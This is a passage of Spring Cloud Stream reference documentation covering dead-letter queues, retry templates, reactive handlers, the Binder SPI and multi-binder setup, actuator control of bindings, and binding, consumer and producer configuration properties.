`input.myGroup.dlq`.\n\nOnce configured, all failed messages are routed to this queue with an error message similar to the following:\n\n[source,text]\n----\ndelivery_mode:\t1\nheaders:\nx-death:\ncount:\t1\nreason:\trejected\nqueue:\tinput.hello\ntime:\t1522328151\nexchange:\nrouting-keys:\tinput.myGroup\nPayload {\"name\u201d:\"Bob\"}\n----\n\nAs you can see from the above, your original message is preserved for further actions.\n\nHowever, one thing you may have noticed is that there is limited information on the original issue with the message processing. 
For example, you do not see a stack\ntrace corresponding to the original error.\nTo get more relevant information about the original error, you must set an additional property:\n\n[source,text]\n----\nspring.cloud.stream.rabbit.bindings.input.consumer.republish-to-dlq=true\n----\n\nDoing so forces the internal error handler to intercept the error message and add additional information to it before publishing it to DLQ.\nOnce configured, you can see that the error message contains more information relevant to the original error, as follows:\n\n[source,text]\n----\ndelivery_mode:\t2\nheaders:\nx-original-exchange:\nx-exception-message:\thas an error\nx-original-routingKey:\tinput.myGroup\nx-exception-stacktrace:\torg.springframework.messaging.MessageHandlingException: nested exception is\n org.springframework.messaging.MessagingException: has an error, failedMessage=GenericMessage [payload=byte[15],\n headers={amqp_receivedDeliveryMode=NON_PERSISTENT, amqp_receivedRoutingKey=input.hello, amqp_deliveryTag=1,\n deliveryAttempt=3, amqp_consumerQueue=input.hello, amqp_redelivered=false, id=a15231e6-3f80-677b-5ad7-d4b1e61e486e,\n amqp_consumerTag=amq.ctag-skBFapilvtZhDsn0k3ZmQg, contentType=application\/json, timestamp=1522327846136}]\n at org.spring...integ...han...MethodInvokingMessageProcessor.processMessage(MethodInvokingMessageProcessor.java:107)\n at. . . . .\nPayload {\"name\u201d:\"Bob\"}\n----\n\nThis effectively combines application-level and system-level error handling to further assist with downstream troubleshooting mechanics.\n\n===== Re-queue Failed Messages\n\nAs mentioned earlier, the currently supported binders (Rabbit and Kafka) rely on `RetryTemplate` to facilitate successful message processing. See <<Retry Template>> for details.\nHowever, for cases when `max-attempts` property is set to 1, internal reprocessing of the message is disabled. At this point, you can facilitate message re-processing (re-tries)\nby instructing the messaging system to re-queue the failed message. 
Once re-queued, the failed message is sent back to the original handler, essentially creating a retry loop.\n\nThis option may be feasible for cases where the nature of the error is related to some sporadic yet short-term unavailability of some resource.\n\nTo accomplish that, you must set the following properties:\n\n[source,text]\n----\nspring.cloud.stream.bindings.input.consumer.max-attempts=1\nspring.cloud.stream.rabbit.bindings.input.consumer.requeue-rejected=true\n----\n\nIn the preceding example, setting `max-attempts` to `1` essentially disables internal retries, and `requeue-rejected` (short for _requeue rejected messages_) is set to `true`.\nOnce set, the failed message is resubmitted to the same handler and loops continuously until the handler throws `AmqpRejectAndDontRequeueException`,\nessentially allowing you to build your own retry logic within the handler itself.\n\n==== Retry Template\n\nThe `RetryTemplate` is part of the https:\/\/github.com\/spring-projects\/spring-retry[Spring Retry] library.\nWhile it is out of scope of this document to cover all of the capabilities of the `RetryTemplate`, we will mention the following consumer properties that are specifically related to\nthe `RetryTemplate`:\n\nmaxAttempts::\nThe number of attempts to process the message.\n+\nDefault: 3.\nbackOffInitialInterval::\nThe backoff initial interval on retry.\n+\nDefault: 1000 milliseconds.\nbackOffMaxInterval::\nThe maximum backoff interval.\n+\nDefault: 10000 milliseconds.\nbackOffMultiplier::\nThe backoff multiplier.\n+\nDefault: 2.0.\ndefaultRetryable::\nWhether exceptions thrown by the listener that are not listed in the `retryableExceptions` are retryable.\n+\nDefault: `true`.\nretryableExceptions::\nA map of Throwable class names in the key and a boolean in the value.\nSpecify those exceptions (and subclasses) that will or won't be retried.\nAlso see `defaultRetryable`.\nExample: `spring.cloud.stream.bindings.input.consumer.retryable-exceptions.java.lang.IllegalStateException=false`.\n+\nDefault: empty.\n\nWhile the preceding settings are sufficient for the majority of the customization requirements, they may not satisfy certain complex requirements, at which\npoint you may want to provide your own instance of the `RetryTemplate`. To do so, configure it as a bean in your application configuration. The application-provided\ninstance overrides the one provided by the framework. Also, to avoid conflicts, you must qualify the instance of the `RetryTemplate` you want to be used by the binder\nas `@StreamRetryTemplate`. For example,\n\n[source,java]\n----\n@StreamRetryTemplate\npublic RetryTemplate myRetryTemplate() {\n return new RetryTemplate();\n}\n----\nAs you can see from the above example, you do not need to annotate it with `@Bean`, since `@StreamRetryTemplate` is a qualified `@Bean`.
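If the defaults need adjusting, a configured instance might look like the following sketch (it uses Spring Retry's `SimpleRetryPolicy` and `ExponentialBackOffPolicy`; the values shown are illustrative):\n\n[source,java]\n----\n@StreamRetryTemplate\npublic RetryTemplate myRetryTemplate() {\n RetryTemplate template = new RetryTemplate();\n \/\/ retry a failed message up to 5 times\n template.setRetryPolicy(new SimpleRetryPolicy(5));\n \/\/ back off exponentially between attempts: 1s, 2s, 4s, ... capped at 10s\n ExponentialBackOffPolicy backOff = new ExponentialBackOffPolicy();\n backOff.setInitialInterval(1000);\n backOff.setMultiplier(2.0);\n backOff.setMaxInterval(10000);\n template.setBackOffPolicy(backOff);\n return template;\n}\n----\n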
[[spring-cloud-stream-overview-reactive-programming-support]]\n=== Reactive Programming Support\n\nSpring Cloud Stream also supports the use of reactive APIs where incoming and outgoing data is handled as continuous data flows.\nSupport for reactive APIs is available through `spring-cloud-stream-reactive`, which needs to be added explicitly to your project.\n\nThe programming model with reactive APIs is declarative.\nInstead of specifying how each individual message should be handled, you can use operators that describe functional transformations from inbound to outbound data flows.\n\nAt present, Spring Cloud Stream supports only the https:\/\/projectreactor.io\/[Reactor API].\nIn the future, we intend to support a more generic model based on Reactive Streams.\n\nThe reactive programming model also uses the `@StreamListener` annotation for setting up reactive handlers.\nThe differences are that:\n\n* The `@StreamListener` annotation must not specify an input or output, as they are provided as arguments and return values from the method.\n* The arguments of the method must be annotated with `@Input` and `@Output`, indicating which input or output the incoming and outgoing data flows connect to, respectively.\n* The return value of the method, if any, is annotated with `@Output`, indicating the output where data should be sent.\n\nNOTE: Reactive programming support requires Java 1.8.\n\nNOTE: As of Spring Cloud Stream 1.1.1 and later (starting with release train Brooklyn.SR2), reactive programming support requires the use of Reactor 3.0.4.RELEASE and higher.\nEarlier Reactor versions (including 3.0.1.RELEASE, 3.0.2.RELEASE and 3.0.3.RELEASE) are not supported.\n`spring-cloud-stream-reactive` transitively retrieves the proper version, but it is possible for the project structure to pin the version of `io.projectreactor:reactor-core` to an earlier release, especially when using Maven.\nThis is the case for projects generated by using Spring Initializr with Spring Boot 1.x, which overrides the Reactor version to `2.0.8.RELEASE`.\nIn such cases, you must ensure that the proper version of the artifact is used.\nYou can do so by adding a direct dependency on `io.projectreactor:reactor-core` with a version of `3.0.4.RELEASE` or later to your project.\n\nNOTE: The use of the term \"`reactive`\" currently refers to the reactive APIs being used and not to the execution model being reactive (that is, the bound endpoints still use a 'push' rather than a 'pull' model). While some backpressure support is provided by the use of Reactor, we do intend, in a future release, to support entirely reactive pipelines by the use of native reactive clients for the connected middleware.\n\n===== Reactor-based Handlers\n\nA Reactor-based handler can have the following argument types:\n\n* For arguments annotated with `@Input`, it supports the Reactor `Flux` type.\nThe parameterization of the inbound Flux follows the same rules as in the case of individual message handling: It can be the entire `Message`, a POJO that can be the `Message` payload, or a POJO that is the result of a transformation based on the `Message` content-type header. Multiple inputs can be provided.\n* For arguments annotated with `@Output`, it supports the `FluxSender` type, which connects a `Flux` produced by the method with an output. Generally speaking, specifying outputs as arguments is only recommended when the method can have multiple outputs.\n\nA Reactor-based handler supports a return type of `Flux`. In that case, it must be annotated with `@Output`. 
We recommend using the return value of the method when a single output `Flux` is available.\n\nThe following example shows a Reactor-based `Processor`:\n\n[source, java]\n----\n@EnableBinding(Processor.class)\n@EnableAutoConfiguration\npublic static class UppercaseTransformer {\n\n @StreamListener\n @Output(Processor.OUTPUT)\n public Flux<String> receive(@Input(Processor.INPUT) Flux<String> input) {\n return input.map(s -> s.toUpperCase());\n }\n}\n----\n\nThe same processor using output arguments looks like the following example:\n\n[source, java]\n----\n@EnableBinding(Processor.class)\n@EnableAutoConfiguration\npublic static class UppercaseTransformer {\n\n @StreamListener\n public void receive(@Input(Processor.INPUT) Flux<String> input,\n @Output(Processor.OUTPUT) FluxSender output) {\n output.send(input.map(s -> s.toUpperCase()));\n }\n}\n----\n\n===== Reactive Sources\n\nSpring Cloud Stream reactive support also provides the ability to create reactive sources through the `@StreamEmitter` annotation.\nBy using the `@StreamEmitter` annotation, a regular source may be converted to a reactive one.\n`@StreamEmitter` is a method-level annotation that marks a method to be an emitter to outputs declared with `@EnableBinding`.\nYou cannot use the `@Input` annotation along with `@StreamEmitter`, as the methods marked with this annotation are not listening for any input. Rather, methods marked with `@StreamEmitter` generate output.\nFollowing the same programming model used in `@StreamListener`, `@StreamEmitter` also allows flexible ways of using the `@Output` annotation, depending on whether the method has any arguments, a return type, and other considerations.\n\nThe remainder of this section contains examples of using the `@StreamEmitter` annotation in various styles.\n\nThe following example emits the `Hello, World` message every millisecond and publishes to a Reactor `Flux`:\n\n[source, java]\n----\n@EnableBinding(Source.class)\n@EnableAutoConfiguration\npublic static class HelloWorldEmitter {\n\n @StreamEmitter\n @Output(Source.OUTPUT)\n public Flux<String> emit() {\n return Flux.intervalMillis(1)\n .map(l -> \"Hello World\");\n }\n}\n----\n\nIn the preceding example, the resulting messages in the `Flux` are sent to the output channel of the `Source`.\n\nThe next example is another flavor of a `@StreamEmitter` that sends a Reactor `Flux`.\nInstead of returning a `Flux`, the following method uses a `FluxSender` to programmatically send a `Flux` from a source:\n\n[source, java]\n----\n@EnableBinding(Source.class)\n@EnableAutoConfiguration\npublic static class HelloWorldEmitter {\n\n @StreamEmitter\n @Output(Source.OUTPUT)\n public void emit(FluxSender output) {\n output.send(Flux.intervalMillis(1)\n .map(l -> \"Hello World\"));\n }\n}\n----\n\nThe next example is exactly the same as the preceding snippet in functionality and style.\nHowever, instead of using an explicit `@Output` annotation on the method, it uses the annotation on the method parameter.\n\n[source, java]\n----\n@EnableBinding(Source.class)\n@EnableAutoConfiguration\npublic static class HelloWorldEmitter {\n\n @StreamEmitter\n public void emit(@Output(Source.OUTPUT) FluxSender output) {\n output.send(Flux.intervalMillis(1)\n .map(l -> \"Hello World\"));\n }\n}\n----\n\nThe last example in this section is yet another flavor of writing reactive sources by using the Reactive Streams Publisher API and taking advantage of the support for it in 
https:\/\/github.com\/spring-projects\/spring-integration-java-dsl\/wiki\/Spring-Integration-Java-DSL-Reference[Spring Integration Java DSL].\nThe `Publisher` in the following example still uses Reactor `Flux` under the hood, but, from an application perspective, that is transparent to the user, who needs only Reactive Streams and the Spring Integration Java DSL:\n\n[source, java]\n----\n@EnableBinding(Source.class)\n@EnableAutoConfiguration\npublic static class HelloWorldEmitter {\n\n @StreamEmitter\n @Output(Source.OUTPUT)\n @Bean\n public Publisher<Message<String>> emit() {\n return IntegrationFlows.from(() ->\n new GenericMessage<>(\"Hello World\"),\n e -> e.poller(p -> p.fixedDelay(1)))\n .toReactivePublisher();\n }\n}\n----\n\n[[spring-cloud-stream-overview-binders]]\n== Binders\n\nSpring Cloud Stream provides a Binder abstraction for use in connecting to physical destinations at the external middleware.\nThis section provides information about the main concepts behind the Binder SPI, its main components, and implementation-specific details.\n\n=== Producers and Consumers\n\nThe following image shows the general relationship of producers and consumers:\n\n.Producers and Consumers\nimage::producers-consumers.png[width=800,scaledwidth=\"75%\",align=\"center\"]\n\nA producer is any component that sends messages to a channel.\nThe channel can be bound to an external message broker with a `Binder` implementation for that broker.\nWhen invoking the `bindProducer()` method, the first parameter is the name of the destination within the broker, the second parameter is the local channel instance to which the producer sends messages, and the third parameter contains properties (such as a partition key expression) to be used within the adapter that is created for that channel.\n\nA consumer is any component that receives messages from a channel.\nAs with a producer, the consumer's channel can be bound to an external message broker.\nWhen invoking the `bindConsumer()` method, the first parameter is the destination name, and a second parameter provides the name of a logical group of consumers.\nEach group that is represented by consumer bindings for a given destination receives a copy of each message that a producer sends to that destination (that is, it follows normal publish-subscribe semantics).\nIf there are multiple consumer instances bound with the same group name, then messages are load-balanced across those consumer instances so that each message sent by a producer is consumed by only a single consumer instance within each group (that is, it follows normal queueing semantics).\n\n[[spring-cloud-stream-overview-binder-api]]\n=== Binder SPI\n\nThe Binder SPI consists of a number of interfaces, out-of-the-box utility classes, and discovery strategies that provide a pluggable mechanism for connecting to external middleware.\n\nThe key point of the SPI is the `Binder` interface, which is a strategy for connecting inputs and outputs to external middleware. The following listing shows the definition of the `Binder` interface:\n\n[source,java]\n----\npublic interface Binder<T, C extends ConsumerProperties, P extends ProducerProperties> {\n Binding<T> bindConsumer(String name, String group, T inboundBindTarget, C consumerProperties);\n\n Binding<T> bindProducer(String name, T outboundBindTarget, P producerProperties);\n}\n----\n\nThe interface is parameterized, offering a number of extension points:\n\n* Input and output bind targets. 
As of version 1.0, only `MessageChannel` is supported, but this is intended to be used as an extension point in the future.\n* Extended consumer and producer properties, allowing specific Binder implementations to add supplemental properties that can be supported in a type-safe manner.\n\nA typical binder implementation consists of the following:\n\n* A class that implements the `Binder` interface;\n* A Spring `@Configuration` class that creates a bean of type `Binder` along with the middleware connection infrastructure.\n* A `META-INF\/spring.binders` file found on the classpath containing one or more binder definitions, as shown in the following example:\n+\n[source]\n----\nkafka:\\\norg.springframework.cloud.stream.binder.kafka.config.KafkaBinderConfiguration\n----\n\n=== Binder Detection\n\nSpring Cloud Stream relies on implementations of the Binder SPI to perform the task of connecting channels to message brokers.\nEach Binder implementation typically connects to one type of messaging system.\n\n==== Classpath Detection\n\nBy default, Spring Cloud Stream relies on Spring Boot's auto-configuration to configure the binding process.\nIf a single Binder implementation is found on the classpath, Spring Cloud Stream automatically uses it.\nFor example, a Spring Cloud Stream project that aims to bind only to RabbitMQ can add the following dependency:\n\n[source,xml]\n----\n<dependency>\n <groupId>org.springframework.cloud<\/groupId>\n <artifactId>spring-cloud-stream-binder-rabbit<\/artifactId>\n<\/dependency>\n----\n\nFor the specific Maven coordinates of other binder dependencies, see the documentation of that binder implementation.\n\n[[multiple-binders]]\n=== Multiple Binders on the Classpath\n\nWhen multiple binders are present on the classpath, the application must indicate which binder is to be used for each channel binding.\nEach binder configuration contains a `META-INF\/spring.binders` file, which is a simple properties file, as shown in the following example:\n\n[source]\n----\nrabbit:\\\norg.springframework.cloud.stream.binder.rabbit.config.RabbitServiceAutoConfiguration\n----\n\nSimilar files exist for the other provided binder implementations (such as Kafka), and custom binder implementations are expected to provide them as well.\nThe key represents an identifying name for the binder implementation, whereas the value is a comma-separated list of configuration classes that each contain one and only one bean definition of type `org.springframework.cloud.stream.binder.Binder`.\n\nBinder selection can either be performed globally, using the `spring.cloud.stream.defaultBinder` property (for example, `spring.cloud.stream.defaultBinder=rabbit`) or individually, by configuring the binder on each channel binding.\nFor instance, a processor application (that has channels named `input` and `output` for read and write respectively) that reads from Kafka and writes to RabbitMQ can specify the following configuration:\n\n[source]\n----\nspring.cloud.stream.bindings.input.binder=kafka\nspring.cloud.stream.bindings.output.binder=rabbit\n----\n\n[[multiple-systems]]\n=== Connecting to Multiple Systems\n\nBy default, binders share the application's Spring Boot auto-configuration, so that one instance of each binder found on the classpath is created.\nIf your application should connect to more than one broker of the same type, you can specify multiple binder configurations, each with different environment settings.\n\nNOTE: Turning on explicit binder configuration disables the default binder 
configuration process altogether.\nIf you do so, all binders in use must be included in the configuration.\nFrameworks that intend to use Spring Cloud Stream transparently may create binder configurations that can be referenced by name, but they do not affect the default binder configuration.\nIn order to do so, a binder configuration may have its `defaultCandidate` flag set to false (for example, `spring.cloud.stream.binders.<configurationName>.defaultCandidate=false`).\nThis denotes a configuration that exists independently of the default binder configuration process.\n\nThe following example shows a typical configuration for a processor application that connects to two RabbitMQ broker instances:\n\n[source,yml]\n----\nspring:\n cloud:\n stream:\n bindings:\n input:\n destination: thing1\n binder: rabbit1\n output:\n destination: thing2\n binder: rabbit2\n binders:\n rabbit1:\n type: rabbit\n environment:\n spring:\n rabbitmq:\n host: <host1>\n rabbit2:\n type: rabbit\n environment:\n spring:\n rabbitmq:\n host: <host2>\n----\n\n=== Binding Visualization and Control\n\nSince version 2.0, Spring Cloud Stream supports visualization and control of the bindings through Actuator endpoints.\n\nStarting with version 2.0, actuator and web are optional. You must first add one of the web dependencies as well as the actuator dependency manually.\nThe following example shows how to add the dependency for the Web framework:\n\n[source,xml]\n----\n<dependency>\n <groupId>org.springframework.boot<\/groupId>\n <artifactId>spring-boot-starter-web<\/artifactId>\n<\/dependency>\n----\n\nThe following example shows how to add the dependency for the WebFlux framework:\n\n[source,xml]\n----\n<dependency>\n <groupId>org.springframework.boot<\/groupId>\n <artifactId>spring-boot-starter-webflux<\/artifactId>\n<\/dependency>\n----\n\nYou can add the Actuator dependency as follows:\n\n[source,xml]\n----\n<dependency>\n <groupId>org.springframework.boot<\/groupId>\n <artifactId>spring-boot-starter-actuator<\/artifactId>\n<\/dependency>\n----\n\nNOTE: To run Spring Cloud Stream 2.0 apps in Cloud Foundry, you must add `spring-boot-starter-web` and `spring-boot-starter-actuator` to the classpath. Otherwise, the application will not start due to health check failures.\n\nYou must also enable the `bindings` actuator endpoints by setting the following property: `--management.endpoints.web.exposure.include=bindings`.\n\nOnce those prerequisites are satisfied, you should see the following in the logs when the application starts:\n\n\t: Mapped \"{[\/actuator\/bindings\/{name}],methods=[POST]. . .\n\t: Mapped \"{[\/actuator\/bindings],methods=[GET]. . .\n\t: Mapped \"{[\/actuator\/bindings\/{name}],methods=[GET]. . 
.\n\nTo visualize the current bindings, access the following URL:\n`http:\/\/<host>:<port>\/actuator\/bindings`\n\nAlternatively, to see a single binding, access one of the URLs similar to the following:\n`http:\/\/<host>:<port>\/actuator\/bindings\/myBindingName`\n\nYou can also stop, start, pause, and resume individual bindings by posting to the same URL while providing a `state` argument as JSON, as shown in the following examples:\n\n[source]\n----\ncurl -d '{\"state\":\"STOPPED\"}' -H \"Content-Type: application\/json\" -X POST http:\/\/<host>:<port>\/actuator\/bindings\/myBindingName\ncurl -d '{\"state\":\"STARTED\"}' -H \"Content-Type: application\/json\" -X POST http:\/\/<host>:<port>\/actuator\/bindings\/myBindingName\ncurl -d '{\"state\":\"PAUSED\"}' -H \"Content-Type: application\/json\" -X POST http:\/\/<host>:<port>\/actuator\/bindings\/myBindingName\ncurl -d '{\"state\":\"RESUMED\"}' -H \"Content-Type: application\/json\" -X POST http:\/\/<host>:<port>\/actuator\/bindings\/myBindingName\n----\n\nNOTE: `PAUSED` and `RESUMED` work only when the corresponding binder and its underlying technology support it. Otherwise, you see a warning message in the logs.\nCurrently, only the Kafka binder supports the `PAUSED` and `RESUMED` states.\n\n=== Binder Configuration Properties\n\nThe following properties are available when customizing binder configurations. These properties are exposed via `org.springframework.cloud.stream.config.BinderProperties`.\n\nThey must be prefixed with `spring.cloud.stream.binders.<configurationName>`.\n\ntype::\nThe binder type.\nIt typically references one of the binders found on the classpath -- in particular, a key in a `META-INF\/spring.binders` file.\n+\nBy default, it has the same value as the configuration name.\ninheritEnvironment::\nWhether the configuration inherits the environment of the application itself.\n+\nDefault: `true`.\nenvironment::\nRoot for a set of properties that can be used to customize the environment of the binder.\nWhen this property is set, the context in which the binder is being created is not a child of the application context.\nThis setting allows for complete separation between the binder components and the application components.\n+\nDefault: `empty`.\ndefaultCandidate::\nWhether the binder configuration is a candidate for being considered a default binder or can be used only when explicitly referenced.\nThis setting allows adding binder configurations without interfering with the default processing.\n+\nDefault: `true`.
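\n\nAs a sketch of how these properties fit together (the configuration name `rabbit1` and the host value are placeholders), the following declares a named binder configuration that must be referenced explicitly:\n\n[source]\n----\nspring.cloud.stream.binders.rabbit1.type=rabbit\nspring.cloud.stream.binders.rabbit1.defaultCandidate=false\nspring.cloud.stream.binders.rabbit1.environment.spring.rabbitmq.host=<host1>\n----\n\n== Configuration Options\n\nSpring Cloud Stream supports general configuration options as well as configuration for bindings and binders.\nSome binders let additional binding properties support middleware-specific features.\n\nConfiguration options can be provided to Spring Cloud Stream applications through any mechanism supported by Spring Boot.\nThis includes application arguments, environment variables, and YAML or .properties files.\n\n=== Binding Service Properties\n\nThese properties are exposed via `org.springframework.cloud.stream.config.BindingServiceProperties`.\n\nspring.cloud.stream.instanceCount::\nThe number of deployed instances of an application.\nMust be set for partitioning on the producer side. 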
Must be set on the consumer side when using RabbitMQ and with Kafka if `autoRebalanceEnabled=false`.\n+\nDefault: `1`.\n\nspring.cloud.stream.instanceIndex::\nThe instance index of the application: a number from `0` to `instanceCount - 1`.\nUsed for partitioning with RabbitMQ and with Kafka if `autoRebalanceEnabled=false`.\nAutomatically set in Cloud Foundry to match the application's instance index.\n\nspring.cloud.stream.dynamicDestinations::\nA list of destinations that can be bound dynamically (for example, in a dynamic routing scenario).\nIf set, only listed destinations can be bound.\n+\nDefault: empty (letting any destination be bound).\n\nspring.cloud.stream.defaultBinder::\nThe default binder to use, if multiple binders are configured.\nSee <<multiple-binders,Multiple Binders on the Classpath>>.\n+\nDefault: empty.\n\nspring.cloud.stream.overrideCloudConnectors::\nThis property is only applicable when the `cloud` profile is active and Spring Cloud Connectors are provided with the application.\nIf the property is `false` (the default), the binder detects a suitable bound service (for example, a RabbitMQ service bound in Cloud Foundry for the RabbitMQ binder) and uses it for creating connections (usually through Spring Cloud Connectors).\nWhen set to `true`, this property instructs binders to completely ignore the bound services and rely on Spring Boot properties (for example, relying on the `spring.rabbitmq.*` properties provided in the environment for the RabbitMQ binder).\nThe typical usage of this property is to be nested in a customized environment <<multiple-systems, when connecting to multiple systems>>.\n+\nDefault: `false`.\n\nspring.cloud.stream.bindingRetryInterval::\nThe interval (in seconds) between retrying binding creation when, for example, the binder does not support late binding and the broker (for example, Apache Kafka) is down.\nSet it to zero to treat such conditions as fatal, preventing the application from starting.\n+\nDefault: `30`.\n\n[[binding-properties]]\n=== Binding Properties\n\nBinding properties are supplied by using the format of `spring.cloud.stream.bindings.<channelName>.<property>=<value>`.\nThe `<channelName>` represents the name of the channel being configured (for example, `output` for a `Source`).\n\nTo avoid repetition, Spring Cloud Stream supports setting values for all channels, in the format of `spring.cloud.stream.default.<property>=<value>`.\n\nTo avoid repetition for extended binding properties, use the format `spring.cloud.stream.<binder-type>.default.<producer|consumer>.<property>=<value>`.
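\n\nAs an illustration of these three formats (the destination and property values are placeholders), the following sketch sets a per-binding value, a default for all bindings, and a binder-wide extended default:\n\n[source]\n----\n# Applies to the 'input' binding only\nspring.cloud.stream.bindings.input.destination=orders\n\n# Applies to all bindings unless overridden\nspring.cloud.stream.default.contentType=application\/json\n\n# Applies to all RabbitMQ consumer bindings (an extended property)\nspring.cloud.stream.rabbit.default.consumer.autoBindDlq=true\n----\n\nIn what follows, we indicate where we have omitted the `spring.cloud.stream.bindings.<channelName>.` prefix and focus just on the property name, with the understanding that the prefix is included at runtime.\n\n==== Common Binding Properties\n\nThese properties are exposed via `org.springframework.cloud.stream.config.BindingProperties`.\n\nThe following binding properties are available for both input and output bindings and must be prefixed with `spring.cloud.stream.bindings.<channelName>.` (for example, `spring.cloud.stream.bindings.input.destination=ticktock`).\n\nDefault values can be set by using the `spring.cloud.stream.default` prefix (for example, `spring.cloud.stream.default.contentType=application\/json`).\n\ndestination::\nThe target destination of a channel on the bound middleware (for example, the RabbitMQ exchange or Kafka topic).\nIf the channel is bound as a consumer, it could be bound to multiple 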
destinations, and the destination names can be specified as comma-separated `String` values.\nIf not set, the channel name is used instead.\nThe default value of this property cannot be overridden.\ngroup::\nThe consumer group of the channel.\nApplies only to inbound bindings.\nSee <<consumer-groups,Consumer Groups>>.\n+\nDefault: `null` (indicating an anonymous consumer).\ncontentType::\nThe content type of the channel.\nSee \"`<<content-type-management>>`\".\n+\nDefault: `application\/json`.\nbinder::\nThe binder used by this binding.\nSee \"`<<multiple-binders>>`\" for details.\n+\nDefault: `null` (the default binder is used, if it exists).\n\n==== Consumer Properties\n\nThese properties are exposed via `org.springframework.cloud.stream.binder.ConsumerProperties`.\n\nThe following binding properties are available for input bindings only and must be prefixed with `spring.cloud.stream.bindings.<channelName>.consumer.` (for example, `spring.cloud.stream.bindings.input.consumer.concurrency=3`).\n\nDefault values can be set by using the `spring.cloud.stream.default.consumer` prefix (for example, `spring.cloud.stream.default.consumer.headerMode=none`).\n\nconcurrency::\nThe concurrency of the inbound consumer.\n+\nDefault: `1`.\npartitioned::\nWhether the consumer receives data from a partitioned producer.\n+\nDefault: `false`.\nheaderMode::\nWhen set to `none`, disables header parsing on input.\nEffective only for messaging middleware that does not support message headers natively and requires header embedding.\nThis option is useful when consuming data from non-Spring Cloud Stream applications when native headers are not supported.\nWhen set to `headers`, it uses the middleware's native header mechanism.\nWhen set to `embeddedHeaders`, it embeds headers into the message payload.\n+\nDefault: depends on the binder implementation.\nmaxAttempts::\nIf processing fails, the number of attempts to process the message (including the first).\nSet to `1` to disable retry.\n+\nDefault: `3`.\nbackOffInitialInterval::\nThe backoff initial interval on retry.\n+\nDefault: `1000`.\nbackOffMaxInterval::\nThe maximum backoff interval.\n+\nDefault: `10000`.\nbackOffMultiplier::\nThe backoff multiplier.\n+\nDefault: `2.0`.\ndefaultRetryable::\nWhether exceptions thrown by the listener that are not listed in the `retryableExceptions` are retryable.\n+\nDefault: `true`.\ninstanceIndex::\nWhen set to a value greater than or equal to zero, it allows customizing the instance index of this consumer (if different from `spring.cloud.stream.instanceIndex`).\nWhen set to a negative value, it defaults to `spring.cloud.stream.instanceIndex`.\nSee \"`<<spring-cloud-stream-overview-instance-index-instance-count>>`\" for more information.\n+\nDefault: `-1`.\ninstanceCount::\nWhen set to a value greater than or equal to zero, it allows customizing the instance count of this consumer (if different from `spring.cloud.stream.instanceCount`).\nWhen set to a negative value, it defaults to `spring.cloud.stream.instanceCount`.\nSee \"`<<spring-cloud-stream-overview-instance-index-instance-count>>`\" for more information.\n+\nDefault: `-1`.\nretryableExceptions::\nA map whose keys are `Throwable` class names and whose values are booleans.\nUse it to specify those exceptions (and subclasses) that will or won't be retried.\nAlso see `defaultRetryable`.\nExample: `spring.cloud.stream.bindings.input.consumer.retryable-exceptions.java.lang.IllegalStateException=false`.\n+\nDefault: empty.\nuseNativeDecoding::\nWhen set to `true`, the inbound message is 
deserialized directly by the client library, which must be configured correspondingly (for example, setting an appropriate Kafka consumer value deserializer).\nWhen this configuration is being used, the inbound message unmarshalling is not based on the `contentType` of the binding.\nWhen native decoding is used, it is the responsibility of the producer to use an appropriate encoder (for example, the Kafka producer value serializer) to serialize the outbound message.\nAlso, when native encoding and decoding is used, the `headerMode=embeddedHeaders` property is ignored and headers are not embedded in the message.\nSee the producer property `useNativeEncoding`.\n+\nDefault: `false`.
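\n\nAs a sketch of how the retry properties combine (the binding name `input` and the values are illustrative), the following configuration retries a failed message up to five times with exponential backoff but never retries an `IllegalStateException`:\n\n[source]\n----\nspring.cloud.stream.bindings.input.consumer.maxAttempts=5\nspring.cloud.stream.bindings.input.consumer.backOffInitialInterval=2000\nspring.cloud.stream.bindings.input.consumer.backOffMultiplier=3.0\nspring.cloud.stream.bindings.input.consumer.retryable-exceptions.java.lang.IllegalStateException=false\n----\n\n==== Producer Properties\n\nThese properties are exposed via `org.springframework.cloud.stream.binder.ProducerProperties`.\n\nThe following binding properties are available for output bindings only and must be prefixed with `spring.cloud.stream.bindings.<channelName>.producer.` (for example, `spring.cloud.stream.bindings.output.producer.partitionKeyExpression=payload.id`).\n\nDefault values can be set by using the prefix `spring.cloud.stream.default.producer` (for example, `spring.cloud.stream.default.producer.partitionKeyExpression=payload.id`).\n\npartitionKeyExpression::\nA SpEL expression that determines how to partition outbound data.\nIf set, or if `partitionKeyExtractorClass` is set, outbound data on this channel is partitioned. `partitionCount` must be set to a value greater than 1 to be effective.\nMutually exclusive with `partitionKeyExtractorClass`.\nSee \"`<<partitioning>>`\".\n+\nDefault: `null`.\npartitionKeyExtractorClass::\nA `PartitionKeyExtractorStrategy` implementation.\nIf set, or if `partitionKeyExpression` is set, outbound data on this channel is partitioned. `partitionCount` must be set to a value greater than 1 to be effective.\nMutually exclusive with `partitionKeyExpression`.\nSee \"`<<partitioning>>`\".\n+\nDefault: `null`.\npartitionSelectorClass::\nA `PartitionSelectorStrategy` implementation.\nMutually exclusive with `partitionSelectorExpression`.\nIf neither is set, the partition is selected as the `hashCode(key) % partitionCount`, where `key` is computed through either `partitionKeyExpression` or `partitionKeyExtractorClass`.\n+\nDefault: `null`.\npartitionSelectorExpression::\nA SpEL expression for customizing partition selection.\nMutually exclusive with `partitionSelectorClass`.\nIf neither is set, the partition is selected as the `hashCode(key) % partitionCount`, where `key` is computed through either `partitionKeyExpression` or `partitionKeyExtractorClass`.\n+\nDefault: `null`.\npartitionCount::\nThe number of target partitions for the data, if partitioning is enabled.\nMust be set to a value greater than 1 if the producer is partitioned.\nOn Kafka, it is interpreted as a hint. 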
The larger of this and the partition count of the target topic is used instead.\n+\nDefault: `1`.\nrequiredGroups::\nA comma-separated list of groups to which the producer must ensure message delivery even if they start after it has been created (for example, by pre-creating durable queues in RabbitMQ).\nheaderMode::\nWhen set to `none`, it disables header embedding on output.\nIt is effective only for messaging middleware that does not support message headers natively and requires header embedding.\nThis option is useful when producing data for non-Spring Cloud Stream applications when native headers are not supported.\nWhen set to `headers`, it uses the middleware's native header mechanism.\nWhen set to `embeddedHeaders`, it embeds headers into the message payload.\n+\nDefault: Depends on the binder implementation.\nuseNativeEncoding::\nWhen set to `true`, the outbound message is serialized directly by the client library, which must be configured correspondingly (for example, setting an appropriate Kafka producer value serializer).\nWhen this configuration is being used, the outbound message marshalling is not based on the `contentType` of the binding.\nWhen native encoding is used, it is the responsibility of the consumer to use an appropriate decoder (for example, the Kafka consumer value de-serializer) to deserialize the inbound message.\nAlso, when native encoding and decoding is used, the `headerMode=embeddedHeaders` property is ignored and headers are not embedded in the message.\nSee the consumer property 